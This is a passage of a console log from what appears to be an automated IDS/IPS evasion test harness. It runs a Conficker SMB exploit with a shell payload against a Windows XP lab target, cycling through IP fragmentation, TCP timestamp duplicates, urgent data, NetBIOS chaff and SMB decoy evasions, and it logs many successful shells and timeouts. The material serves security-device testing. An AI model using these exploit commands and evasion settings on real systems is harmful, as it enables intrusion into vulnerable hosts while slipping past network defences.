  3781. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56602 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=RiI6C+8sOvQ --evasion=[start,msrpc_bind]ipv4_frag,"352" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","zero" --verifydelay=1000 --payload=shell
  3782. Info: Using random seed RiI6C+8sOvR
  3783. The following evasions are applied from stage start to msrpc_bind:
  3784. - IPv4 fragments with at most 352 bytes per fragment
  3785. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  3786. - 75% probability to add a zero urgent data byte to a TCP segment.
  3787.  
  3788. Info: NetBIOS connection 10.62.90.113:56602 -> 10.35.1.207:445
  3789. Terminated
  3790. ..Pid 19507 timed out - killed
  3791. 2015-06-08 00:15:37 INFO
  3792. Timed out (10.62.90.114):
  3793. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30669 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=uTRrvWQWLxA --evasion=[smb_opentree,msrpc_req]ipv4_frag,"312" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","2","random_alpha" --verifydelay=1000 --payload=shell
  3794. Info: Using random seed uTRrvWQWLxC
  3795. The following evasions are applied from stage smb_opentree to msrpc_req:
  3796. - IPv4 fragments with at most 312 bytes per fragment
  3797. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3798. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has random alpha bytes as payload
  3799.  
  3800. Info: NetBIOS connection 10.62.90.114:30669 -> 10.35.1.207:445
  3801. Terminated
  3802. 2015-06-08 00:15:37 INFO
  3803. Success. (10.62.90.113):
  3804. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25027 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=vYkbu33Qkdw --evasion=[smb_connect,end]netbios_chaff,"1","empty_keepalive|small_unspec|http_get|msrpc_req" --evasion=[smb_connect,end]tcp_paws,"2","8","random_alpha" --verifydelay=1000 --payload=shell
  3805. Info: Using random seed vYkbu33Qkdy
  3806. The following evasions are applied from stage smb_connect to end:
  3807. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
  3808. - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  3809.  
  3810. Info: NetBIOS connection 10.62.90.113:25027 -> 10.35.1.207:445
  3811. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3812. Info: Sending MSRPC request with exploit
  3813. Info: Shell found, attack succeeded
  3814. Info: Command shell connection reset.
  3815. Info: CommandShell::SendCommand() - Failed to send string
  3816. Info: Shell closed
  3817. 0: Success.
  3818. ..........
  3819. 6573 runs averaging 1.95 runs / second ; progress: 3370/43200........
  3820. 6581 runs averaging 1.95 runs / second ; progress: 3375/43200
  3821. 6581 runs averaging 1.95 runs / second ; progress: 3380/43200..
  3822. 6583 runs averaging 1.94 runs / second ; progress: 3385/43200.......
  3823. 6590 runs averaging 1.94 runs / second ; progress: 3390/43200.............
  3824. 6603 runs averaging 1.95 runs / second ; progress: 3395/43200.......2015-06-08 00:16:09 INFO
  3825. Success. (10.62.90.113):
  3826. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=PeJtMGJRh88 --evasion=[smb_openpipe,msrpc_req]ipv4_opt,"3","inc","shuffle" --evasion=[smb_connect,msrpc_bind]smb_writeandxpad,"6","zero" --evasion=[netbios_connect,end]tcp_paws,"1","145135867","random" --verifydelay=1000 --payload=shell
  3827. Info: Using random seed PeJtMGJRh88
  3828. The following evasions are applied from stage netbios_connect to end:
  3829. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 145135867> and has random bytes as payload
  3830. The following evasions are applied from stage smb_connect to msrpc_bind:
  3831. - 6 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  3832. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3833. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3834. The duplicate packet has shuffled payload
  3835.  
  3836. Info: NetBIOS connection 10.62.90.113:24268 -> 10.35.1.207:445
  3837. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3838. Info: Sending MSRPC request with exploit
  3839. Info: Shell found, attack succeeded
  3840. Info: CommandShell::SendCommand() - Failed to send string
  3841. Info: Command shell connection reset.
  3842. Info: Shell closed
  3843. 0: Success.
  3844. ..
  3845. 6613 runs averaging 1.95 runs / second ; progress: 3400/43200..2015-06-08 00:16:11 INFO
  3846. Success. (10.62.90.114):
  3847. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25887 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=fnJDHWfO8Io --evasion=[smb_connect,smb_openpipe]netbios_chaff,"25%","empty_unspec|empty_keepalive|msrpc_req" --evasion=[smb_openpipe,end]tcp_paws,"75%","88733991","zero" --verifydelay=1000 --payload=shell
  3848. Info: Using random seed fnJDHWfO8Ip
  3849. The following evasions are applied from stage smb_connect to smb_openpipe:
  3850. - 25% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  3851. The following evasions are applied from stage smb_openpipe to end:
  3852. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 88733991> and has 0x00 bytes as payload
  3853.  
  3854. Info: NetBIOS connection 10.62.90.114:25887 -> 10.35.1.207:445
  3855. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3856. Info: Sending MSRPC request with exploit
  3857. Info: Shell found, attack succeeded
  3858. Info: CommandShell::SendCommand() - Failed to send string
  3859. Info: Command shell connection reset.
  3860. Info: Shell closed
  3861. 0: Success.
  3862. .....
  3863. 6621 runs averaging 1.94 runs / second ; progress: 3405/43200...
  3864. 6624 runs averaging 1.94 runs / second ; progress: 3410/43200
  3865. 6624 runs averaging 1.94 runs / second ; progress: 3415/43200......
  3866. 6630 runs averaging 1.94 runs / second ; progress: 3420/43200..............
  3867. 6644 runs averaging 1.94 runs / second ; progress: 3425/43200..............
  3868. 6658 runs averaging 1.94 runs / second ; progress: 3430/43200............
  3869. 6670 runs averaging 1.94 runs / second ; progress: 3435/43200....Pid 20341 timed out - killed
  3870. 2015-06-08 00:16:47 INFO
  3871. Timed out (10.62.90.117):
  3872. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16556 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=RMgfaYyc57k --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,end]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  3873. Info: Using random seed RMgfaYyc57l
  3874. The following evasions are applied from stage smb_opentree to end:
  3875. - Add a random alphaurgent data byte to every 2 TCP segment.
  3876. The following evasions are applied from stage msrpc_req to end:
  3877. - TCP timestamps echo reply value is sent in the wrong endianness
  3878.  
  3879. Info: NetBIOS connection 10.62.90.117:16556 -> 10.35.1.207:445
  3880. Terminated
  3881. .........
  3882. 6684 runs averaging 1.94 runs / second ; progress: 3440/43200...........
  3883. 6695 runs averaging 1.94 runs / second ; progress: 3445/43200.....2015-06-08 00:16:58 INFO
  3884. Success. (10.62.90.113):
  3885. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38858 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=9ilraWnyxh4 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"25%","4","alphanumrandomized" --evasion=[msrpc_bind,end]tcp_paws,"1","4961990","random_alpha" --verifydelay=1000 --payload=shell
  3886. Info: Using random seed 9ilraWnyxh7
  3887. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  3888. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
  3889. The following evasions are applied from stage msrpc_bind to end:
  3890. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4961990> and has random alpha bytes as payload
  3891.  
  3892. Info: NetBIOS connection 10.62.90.113:38858 -> 10.35.1.207:445
  3893. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3894. Info: Sending MSRPC request with exploit
  3895. Info: Shell found, attack succeeded
  3896. Info: Shell closed
  3897. 0: Success.
  3898. ....
  3899. 6705 runs averaging 1.94 runs / second ; progress: 3450/43200........
  3900. 6713 runs averaging 1.94 runs / second ; progress: 3455/43200.........
  3901. 6722 runs averaging 1.94 runs / second ; progress: 3460/43200..........
  3902. 6732 runs averaging 1.94 runs / second ; progress: 3465/43200.....
  3903. 6737 runs averaging 1.94 runs / second ; progress: 3470/43200...
  3904. 6740 runs averaging 1.94 runs / second ; progress: 3475/43200.....
  3905. 6745 runs averaging 1.94 runs / second ; progress: 3480/43200............
  3906. 6757 runs averaging 1.94 runs / second ; progress: 3485/432002015-06-08 00:17:35 INFO
  3907. Success. (10.62.90.114):
  3908. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29037 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=zoGhygQj2a0 --evasion=[smb_connect,msrpc_bind]ipv4_opt,"2","inc","shuffletcp" --evasion=[smb_openpipe,end]tcp_paws,"50%","33475370","zero" --verifydelay=1000 --payload=shell
  3909. Info: Using random seed zoGhygQj2a3
  3910. The following evasions are applied from stage smb_connect to msrpc_bind:
  3911. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  3912. The duplicate packet has shuffled TCP payload
  3913. The following evasions are applied from stage smb_openpipe to end:
  3914. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33475370> and has 0x00 bytes as payload
  3915.  
  3916. Info: NetBIOS connection 10.62.90.114:29037 -> 10.35.1.207:445
  3917. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3918. Info: Sending MSRPC request with exploit
  3919. Info: Shell found, attack succeeded
  3920. Info: Shell closed
  3921. 0: Success.
  3922. ......
  3923. 6764 runs averaging 1.94 runs / second ; progress: 3490/43200....
  3924. 6768 runs averaging 1.94 runs / second ; progress: 3495/43200.......
  3925. 6775 runs averaging 1.94 runs / second ; progress: 3500/43200........
  3926. 6783 runs averaging 1.94 runs / second ; progress: 3505/43200.
  3927. 6784 runs averaging 1.93 runs / second ; progress: 3510/43200
  3928. 6784 runs averaging 1.93 runs / second ; progress: 3515/43200
  3929. 6784 runs averaging 1.93 runs / second ; progress: 3520/43200....
  3930. 6788 runs averaging 1.93 runs / second ; progress: 3525/43200.....
  3931. 6793 runs averaging 1.92 runs / second ; progress: 3530/43200..Pid 21204 timed out - killed
  3932. 2015-06-08 00:18:21 INFO
  3933. Timed out (10.62.90.118):
  3934. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33089 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BaIgcwZW4VQ --evasion=[start,netbios_connect]tcp_chaff,"2","nullchksum|nullflag|longhdr","unmodified" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1478","new","random" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  3935. Info: Using random seed BaIgcwZW4VQ
  3936. The following evasions are applied from stage start to netbios_connect:
  3937.  
  3938. The following evasions are applied from stage netbios_connect to msrpc_bind:
  3939. - TCP segments are set to overlap by 1478 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
  3940. The following evasions are applied from stage smb_opentree to msrpc_req:
  3941. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  3942.  
  3943. Info: NetBIOS connection 10.62.90.118:33089 -> 10.35.1.207:445
  3944. Terminated
  3945. ........
  3946. 6804 runs averaging 1.92 runs / second ; progress: 3535/43200.....
  3947. 6809 runs averaging 1.92 runs / second ; progress: 3540/43200......
  3948. 6815 runs averaging 1.92 runs / second ; progress: 3545/43200......
  3949. 6821 runs averaging 1.92 runs / second ; progress: 3550/43200.........
  3950. 6830 runs averaging 1.92 runs / second ; progress: 3555/43200Pid 21497 timed out - killed
  3951. 2015-06-08 00:18:45 INFO
  3952. Timed out (10.62.90.115):
  3953. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62671 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=o7JIQ5gkSRo --evasion=[msrpc_bind,end]ipv4_frag,"56" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
  3954. Info: Using random seed o7JIQ5gkSRq
  3955. The following evasions are applied from stage smb_opentree to msrpc_bind:
  3956. - Add a random alphaurgent data byte to every 2 TCP segment.
  3957. The following evasions are applied from stage msrpc_bind to end:
  3958. - IPv4 fragments with at most 56 bytes per fragment
  3959.  
  3960. Info: NetBIOS connection 10.62.90.115:62671 -> 10.35.1.207:445
  3961. Terminated
  3962. .....
  3963. 6836 runs averaging 1.92 runs / second ; progress: 3560/43200.......
  3964. 6843 runs averaging 1.92 runs / second ; progress: 3565/43200Pid 21595 timed out - killed
  3965. 2015-06-08 00:18:55 INFO
  3966. Timed out (10.62.90.110):
  3967. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13471 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=xLQU+B0/gW8 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"1","3","8","random" --evasion=[msrpc_bind,end]smb_seg,"4" --evasion=[smb_opentree,end]tcp_paws,"2","2","alphanumrandomized" --verifydelay=1000 --payload=shell
  3968. Info: Using random seed xLQU+B0/gW/
  3969. The following evasions are applied from stage smb_opentree to end:
  3970. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphanumeric bytes randomized
  3971. The following evasions are applied from stage smb_opentree to msrpc_bind:
  3972. - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
  3973. The following evasions are applied from stage msrpc_bind to end:
  3974. - SMB writes are segmented to contain at most 4 bytes of payload.
  3975.  
  3976. Info: NetBIOS connection 10.62.90.110:13471 -> 10.35.1.207:445
  3977. Terminated
  3978. ............
  3979. 6856 runs averaging 1.92 runs / second ; progress: 3570/43200..................
  3980. 6874 runs averaging 1.92 runs / second ; progress: 3575/43200.....
  3981. 6879 runs averaging 1.92 runs / second ; progress: 3581/43200.
  3982. 6880 runs averaging 1.92 runs / second ; progress: 3586/43200.....
  3983. 6885 runs averaging 1.92 runs / second ; progress: 3591/43200.........2015-06-08 00:19:24 INFO
  3984. Success. (10.62.90.116):
  3985. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22534 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=E1WN1gofr4c --evasion=[start,netbios_connect]tcp_paws,"25%","2","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","5","alpharandomized" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  3986. Info: Using random seed E1WN1gofr4c
  3987. The following evasions are applied from stage start to netbios_connect:
  3988. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
  3989. The following evasions are applied from stage netbios_connect to smb_connect:
  3990. - TCP timestamps echo reply value is sent in the wrong endianness
  3991. The following evasions are applied from stage smb_openpipe to msrpc_req:
  3992. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
  3993.  
  3994. Info: NetBIOS connection 10.62.90.116:22534 -> 10.35.1.207:445
  3995. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  3996. Info: Sending MSRPC request with exploit
  3997. Info: Shell found, attack succeeded
  3998. Info: Shell closed
  3999. 0: Success.
  4000.  
  4001. 6895 runs averaging 1.92 runs / second ; progress: 3596/43200..Pid 22023 timed out - killed
  4002. 2015-06-08 00:19:27 INFO
  4003. Timed out (10.62.90.111):
  4004. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27003 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=EpXCyMOuFpI --evasion=[msrpc_bind,end]smb_seg,"6" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  4005. Info: Using random seed EpXCyMOuFpI
  4006. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4007. - Add a zero urgent data byte to every 2 TCP segment.
  4008. The following evasions are applied from stage msrpc_bind to end:
  4009. - SMB writes are segmented to contain at most 6 bytes of payload.
  4010.  
  4011. Info: NetBIOS connection 10.62.90.111:27003 -> 10.35.1.207:445
  4012. Terminated
  4013. .............
  4014. 6911 runs averaging 1.92 runs / second ; progress: 3601/43200.................
  4015. 6928 runs averaging 1.92 runs / second ; progress: 3606/43200.............
  4016. 6941 runs averaging 1.92 runs / second ; progress: 3611/43200...........
  4017. 6952 runs averaging 1.92 runs / second ; progress: 3616/43200.............
  4018. 6965 runs averaging 1.92 runs / second ; progress: 3621/43200.......2015-06-08 00:19:54 INFO
  4019. Success. (10.62.90.118):
  4020. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16614 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=or/a1zhDenU --evasion=[netbios_connect,smb_connect]ipv4_opt,"8","inc","unmodified" --evasion=[smb_openpipe,end]tcp_paws,"2","8","zero" --verifydelay=1000 --payload=shell
  4021. Info: Using random seed or/a1zhDenW
  4022. The following evasions are applied from stage netbios_connect to smb_connect:
  4023. - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4024. The duplicate packet has identical payload
  4025. The following evasions are applied from stage smb_openpipe to end:
  4026. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
  4027.  
  4028. Info: NetBIOS connection 10.62.90.118:16614 -> 10.35.1.207:445
  4029. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4030. Info: Sending MSRPC request with exploit
  4031. Info: Shell found, attack succeeded
  4032. Info: CommandShell::SendCommand() - Failed to send string
  4033. Info: Command shell connection reset.
  4034. Info: Shell closed
  4035. 0: Success.
  4036. ..
  4037. 6975 runs averaging 1.92 runs / second ; progress: 3626/43200....Pid 22296 timed out - killed
  4038. 2015-06-08 00:19:58 INFO
  4039. Timed out (10.62.90.112):
  4040. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18149 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=7rGocRK0Uq8 --evasion=[smb_connect,msrpc_req]smb_writeandxpad,"1022","zero" --evasion=[smb_connect,msrpc_req]tcp_segvar,"5","65533" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  4041. Info: Using random seed 7rGocRK0Uq/
  4042. The following evasions are applied from stage smb_connect to msrpc_req:
  4043. - TCP packets are segmented to contain between 5 and 65533 bytes of payload.
  4044. - 1022 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  4045. The following evasions are applied from stage smb_openpipe to end:
  4046. - 75% probability to add a random urgent data byte to a TCP segment.
  4047.  
  4048. Info: NetBIOS connection 10.62.90.112:18149 -> 10.35.1.207:445
  4049. Terminated
  4050. .....
  4051. 6985 runs averaging 1.92 runs / second ; progress: 3631/43200.........
  4052. 6994 runs averaging 1.92 runs / second ; progress: 3636/43200..
  4053. 6996 runs averaging 1.92 runs / second ; progress: 3641/43200.....
  4054. 7001 runs averaging 1.92 runs / second ; progress: 3646/432002015-06-08 00:20:17 INFO
  4055. Success. (10.62.90.111):
  4056. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51373 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=x4ty6ZS0nOg --evasion=[netbios_connect,smb_opentree]tcp_paws,"5","245151688","zero" --evasion=[smb_openpipe,end]tcp_paws,"75%","268435454","alphanumrandomized" --verifydelay=1000 --payload=shell
  4057. Info: Using random seed x4ty6ZS0nOj
  4058. The following evasions are applied from stage netbios_connect to smb_opentree:
  4059. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 245151688> and has 0x00 bytes as payload
  4060. The following evasions are applied from stage smb_openpipe to end:
  4061. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
  4062.  
  4063. Info: NetBIOS connection 10.62.90.111:51373 -> 10.35.1.207:445
  4064. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4065. Info: Sending MSRPC request with exploit
  4066. Info: Shell found, attack succeeded
  4067. Info: Shell closed
  4068. 0: Success.
  4069. .......2015-06-08 00:20:20 INFO
  4070. Success. (10.62.90.112):
  4071. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20184 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=/GWBnefJ0qc --evasion=[smb_opentree,end]smb_decoytrees,"7","1","7","random_msrpcreq" --evasion=[smb_opentree,msrpc_req]tcp_segvar,"6","23567" --verifydelay=1000 --payload=shell
  4072. Info: Using random seed /GWBnefJ0qf
  4073. The following evasions are applied from stage smb_opentree to msrpc_req:
  4074. - TCP packets are segmented to contain between 6 and 23567 bytes of payload.
  4075. The following evasions are applied from stage smb_opentree to end:
  4076. - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
  4077.  
  4078. Info: NetBIOS connection 10.62.90.112:20184 -> 10.35.1.207:445
  4079. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4080. Info: Sending MSRPC request with exploit
  4081. Info: Shell found, attack succeeded
  4082. Info: CommandShell::SendCommand() - Failed to send string
  4083. Info: Command shell connection reset.
  4084. Info: Shell closed
  4085. 0: Success.
  4086. ...
  4087. 7013 runs averaging 1.92 runs / second ; progress: 3651/43200............2015-06-08 00:20:24 INFO
  4088. Success. (10.62.90.111):
  4089. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50253 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=+EAg6yyT0Q8 --evasion=[netbios_connect,smb_openpipe]netbios_chaff,"3","empty_keepalive|small_unspec|broken_length" --evasion=[msrpc_bind,end]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"2","138129007","random_alpha" --verifydelay=1000 --payload=shell
  4090. Info: Using random seed +EAg6yyT0Q/
  4091. The following evasions are applied from stage netbios_connect to smb_openpipe:
  4092. - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4093. The following evasions are applied from stage smb_connect to end:
  4094. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 138129007> and has random alpha bytes as payload
  4095. The following evasions are applied from stage msrpc_bind to end:
  4096. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  4097.  
  4098. Info: NetBIOS connection 10.62.90.111:50253 -> 10.35.1.207:445
  4099. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4100. Info: Sending MSRPC request with exploit
  4101. Info: Shell found, attack succeeded
  4102. Info: Shell closed
  4103. 0: Success.
  4104. ...
  4105. 7029 runs averaging 1.92 runs / second ; progress: 3656/43200..........
  4106. 7039 runs averaging 1.92 runs / second ; progress: 3661/43200
  4107. 7039 runs averaging 1.92 runs / second ; progress: 3666/43200....
  4108. 7043 runs averaging 1.92 runs / second ; progress: 3671/43200Pid 22703 timed out - killed
  4109. 2015-06-08 00:20:41 INFO
  4110. Timed out (10.62.90.119):
  4111. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11635 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=zuKNA5Eh+dU --evasion=[msrpc_req,end]tcp_overlap,"148","new","random_alpha" --evasion=[start,msrpc_bind]tcp_paws,"3","259841060","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  4112. Info: Using random seed zuKNA5Eh+dX
  4113. The following evasions are applied from stage start to msrpc_bind:
  4114. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 259841060> and has random alpha bytes as payload
  4115. The following evasions are applied from stage smb_opentree to msrpc_bind:
  4116. - Add a zero urgent data byte to every 2 TCP segment.
  4117. The following evasions are applied from stage msrpc_req to end:
  4118. - TCP segments are set to overlap by 148 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
  4119.  
  4120. Info: NetBIOS connection 10.62.90.119:11635 -> 10.35.1.207:445
  4121. Terminated
  4122. ...2015-06-08 00:20:42 INFO
  4123. Success. (10.62.90.119):
  4124. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34260 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=OThj9hiUOtM --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"3","6","9","zero" --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --verifydelay=1000 --payload=shell
  4125. Info: Using random seed OThj9hiUOtM
  4126. The following evasions are applied from stage smb_connect to end:
  4127. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
  4128. The following evasions are applied from stage smb_opentree to msrpc_req:
  4129. - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 9 bytes of zeroes.
  4130.  
  4131. Info: NetBIOS connection 10.62.90.119:34260 -> 10.35.1.207:445
  4132. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4133. Info: Sending MSRPC request with exploit
  4134. Info: Shell found, attack succeeded
  4135. Info: CommandShell::SendCommand() - Failed to send string
  4136. Info: Command shell connection reset.
  4137. Info: Shell closed
  4138. 0: Success.
  4139. ..............
  4140. 7062 runs averaging 1.92 runs / second ; progress: 3676/43200........................
  4141. 7086 runs averaging 1.93 runs / second ; progress: 3681/43200....................
  4142. 7106 runs averaging 1.93 runs / second ; progress: 3686/43200............
  4143. 7118 runs averaging 1.93 runs / second ; progress: 3691/43200.........
  4144. 7127 runs averaging 1.93 runs / second ; progress: 3696/43200............
  4145. 7139 runs averaging 1.93 runs / second ; progress: 3701/43200......................
